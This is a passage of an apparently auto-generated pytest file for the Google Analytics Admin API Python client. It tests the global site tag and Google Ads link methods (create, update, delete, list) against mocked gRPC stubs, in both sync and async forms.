call.mock_calls[0] assert args[0] == analytics_admin.GetGlobalSiteTagRequest() # Establish that the response is the type that we expect. 
    assert isinstance(response, resources.GlobalSiteTag)
    assert response.name == "name_value"
    assert response.snippet == "snippet_value"


def test_get_global_site_tag_from_dict():
    """The request may also be supplied as a plain dict."""
    test_get_global_site_tag(request_type=dict)


def test_get_global_site_tag_empty_call():
    """A call with no request and no flattened fields still succeeds."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        client.get_global_site_tag()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        # An empty call still produces a default request object.
        assert args[0] == analytics_admin.GetGlobalSiteTagRequest()


@pytest.mark.asyncio
async def test_get_global_site_tag_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.GetGlobalSiteTagRequest,
):
    """Async variant: GetGlobalSiteTag sends the request and maps fields."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.GlobalSiteTag(name="name_value", snippet="snippet_value",)
        )
        response = await client.get_global_site_tag(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetGlobalSiteTagRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.GlobalSiteTag)
    assert response.name == "name_value"
    assert response.snippet == "snippet_value"


@pytest.mark.asyncio
async def test_get_global_site_tag_async_from_dict():
    """Async variant: the request may also be supplied as a plain dict."""
    await test_get_global_site_tag_async(request_type=dict)


def test_get_global_site_tag_field_headers():
    """Routing fields must be propagated as x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetGlobalSiteTagRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        call.return_value = resources.GlobalSiteTag()
        client.get_global_site_tag(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_global_site_tag_field_headers_async():
    """Async variant: routing fields propagate as request-params metadata."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetGlobalSiteTagRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.GlobalSiteTag()
        )
        await client.get_global_site_tag(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_global_site_tag_flattened():
    """Flattened keyword args must be packed into the request message."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.GlobalSiteTag()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_global_site_tag(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_global_site_tag_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_global_site_tag(
            analytics_admin.GetGlobalSiteTagRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_global_site_tag_flattened_async():
    """Async variant: flattened kwargs are packed into the request message."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_global_site_tag), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.GlobalSiteTag()
        # The async surface awaits the stub, so the final return value is a
        # fake unary-unary call wrapping the response message.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.GlobalSiteTag()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.get_global_site_tag(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_get_global_site_tag_flattened_error_async():
    """Async variant: request object plus flattened fields must raise."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.get_global_site_tag(
            analytics_admin.GetGlobalSiteTagRequest(), name="name_value",
        )


def test_create_google_ads_link(
    transport: str = "grpc", request_type=analytics_admin.CreateGoogleAdsLinkRequest
):
    """CreateGoogleAdsLink sends the request and maps response fields."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_google_ads_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.GoogleAdsLink(
            name="name_value",
            customer_id="customer_id_value",
            can_manage_clients=True,
            creator_email_address="creator_email_address_value",
        )
        response = client.create_google_ads_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest()

    # Establish that the response is the type that we expect.
assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" def test_create_google_ads_link_from_dict(): test_create_google_ads_link(request_type=dict) def test_create_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: client.create_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_create_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) ) response = await client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" @pytest.mark.asyncio async def test_create_google_ads_link_async_from_dict(): await test_create_google_ads_link_async(request_type=dict) def test_create_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateGoogleAdsLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: call.return_value = resources.GoogleAdsLink() client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateGoogleAdsLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) await client.create_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_google_ads_link( parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") def test_create_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.create_google_ads_link( analytics_admin.CreateGoogleAdsLinkRequest(), parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) @pytest.mark.asyncio async def test_create_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_google_ads_link( parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") @pytest.mark.asyncio async def test_create_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.create_google_ads_link( analytics_admin.CreateGoogleAdsLinkRequest(), parent="parent_value", google_ads_link=resources.GoogleAdsLink(name="name_value"), ) def test_update_google_ads_link( transport: str = "grpc", request_type=analytics_admin.UpdateGoogleAdsLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) response = client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" def test_update_google_ads_link_from_dict(): test_update_google_ads_link(request_type=dict) def test_update_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: client.update_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_update_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink( name="name_value", customer_id="customer_id_value", can_manage_clients=True, creator_email_address="creator_email_address_value", ) ) response = await client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleAdsLinkRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.GoogleAdsLink) assert response.name == "name_value" assert response.customer_id == "customer_id_value" assert response.can_manage_clients is True assert response.creator_email_address == "creator_email_address_value" @pytest.mark.asyncio async def test_update_google_ads_link_async_from_dict(): await test_update_google_ads_link_async(request_type=dict) def test_update_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleAdsLinkRequest() request.google_ads_link.name = "google_ads_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: call.return_value = resources.GoogleAdsLink() client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_ads_link.name=google_ads_link.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleAdsLinkRequest() request.google_ads_link.name = "google_ads_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) await client.update_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_ads_link.name=google_ads_link.name/value", ) in kw["metadata"] def test_update_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_google_ads_link( google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.update_google_ads_link( analytics_admin.UpdateGoogleAdsLinkRequest(), google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleAdsLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleAdsLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_google_ads_link( google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].google_ads_link == resources.GoogleAdsLink(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_google_ads_link( analytics_admin.UpdateGoogleAdsLinkRequest(), google_ads_link=resources.GoogleAdsLink(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_delete_google_ads_link( transport: str = "grpc", request_type=analytics_admin.DeleteGoogleAdsLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_google_ads_link_from_dict(): test_delete_google_ads_link(request_type=dict) def test_delete_google_ads_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: client.delete_google_ads_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() @pytest.mark.asyncio async def test_delete_google_ads_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteGoogleAdsLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteGoogleAdsLinkRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_google_ads_link_async_from_dict(): await test_delete_google_ads_link_async(request_type=dict) def test_delete_google_ads_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteGoogleAdsLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: call.return_value = None client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_google_ads_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteGoogleAdsLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_google_ads_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_google_ads_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
client.delete_google_ads_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_google_ads_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_google_ads_link( analytics_admin.DeleteGoogleAdsLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_google_ads_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_google_ads_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_google_ads_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_google_ads_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.delete_google_ads_link( analytics_admin.DeleteGoogleAdsLinkRequest(), name="name_value", ) def test_list_google_ads_links( transport: str = "grpc", request_type=analytics_admin.ListGoogleAdsLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListGoogleAdsLinksResponse( next_page_token="next_page_token_value", ) response = client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListGoogleAdsLinksPager) assert response.next_page_token == "next_page_token_value" def test_list_google_ads_links_from_dict(): test_list_google_ads_links(request_type=dict) def test_list_google_ads_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: client.list_google_ads_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() @pytest.mark.asyncio async def test_list_google_ads_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListGoogleAdsLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListGoogleAdsLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListGoogleAdsLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListGoogleAdsLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_google_ads_links_async_from_dict(): await test_list_google_ads_links_async(request_type=dict) def test_list_google_ads_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. 
request = analytics_admin.ListGoogleAdsLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: call.return_value = analytics_admin.ListGoogleAdsLinksResponse() client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_google_ads_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListGoogleAdsLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListGoogleAdsLinksResponse() ) await client.list_google_ads_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_google_ads_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = analytics_admin.ListGoogleAdsLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_google_ads_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_google_ads_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_google_ads_links( analytics_admin.ListGoogleAdsLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_google_ads_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListGoogleAdsLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( 